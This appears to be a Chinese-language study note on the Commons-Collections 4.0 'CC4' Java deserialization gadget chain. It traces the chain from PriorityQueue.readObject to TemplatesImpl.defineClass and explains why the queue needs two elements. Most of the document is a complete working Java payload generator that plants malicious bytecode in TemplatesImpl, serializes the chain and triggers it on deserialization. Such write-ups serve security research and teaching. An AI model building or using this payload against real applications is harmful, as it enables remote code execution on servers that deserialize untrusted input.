CC4
参考:https://www.cnblogs.com/1vxyz/p/17473641.html
环境:jdk8u65 && Commons-collections 4.0
CommonsCollections4除4.0的其他版本InvokerTransformer不再继承Serializable
但是TransformingComparator继承了Serializable 但是Commons-collections3里没有
CC4链子sink点也是definClass加载恶意类 所以后半段可以沿用CC3来
前半段找transform调用 最后找到了PriorityQueue优先队列里
链子如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| Gadget chain:
PriorityQueue::readObject() ->
PriorityQueue::heapify() ->
PriorityQueue::siftDown() ->
PriorityQueue::siftDownUsingComparator() ->
TransformingComparator::compare() ->
ChainedTransformer::transform() ->
ConstantTransformer::transform() ->
InstantiateTransformer::transform ->
TrAXFilter::TrAXFilter() ->
TemplatesImpl::newTransformer() ->
TemplatesImpl::getTransletInstance() ->
TemplatesImpl::defineTransletClasses() ->
TransletClassLoader::defineClass()
|
跟着链来的话只需要考虑一个问题
这里我们需要进循环触发siftDown() 而初始的size是0 所以这里需要给queue再add两个元素 让循环能进去
这里我试了setFieldValue(priorityQueue,"size",2);也能加载恶意类
如果调用add()的话 得考虑别在序列化数据的时候就触发了 所以得先用ConstantTransformer占个位
payload如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| public class cc4 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates,"_name","jed");
byte[] code = Files.readAllBytes(Paths.get("target/classes/evil.class"));
byte[][] codes = {code};
setFieldValue(templates,"_bytecodes",codes);
setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
instantiateTransformer
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(1);
priorityQueue.add(2);
setFieldValue(transformingComparator,"transformer",chainedTransformer);
serialize(priorityQueue);
unserialize("sercc4.bin");
}
public static void setFieldValue(Object object,String field_name,Object filed_value) throws NoSuchFieldException, IllegalAccessException {
Class clazz=object.getClass();
Field declaredField=clazz.getDeclaredField(field_name);
declaredField.setAccessible(true);
declaredField.set(object,filed_value);
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("sercc4.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
return ois.readObject();
}
}
|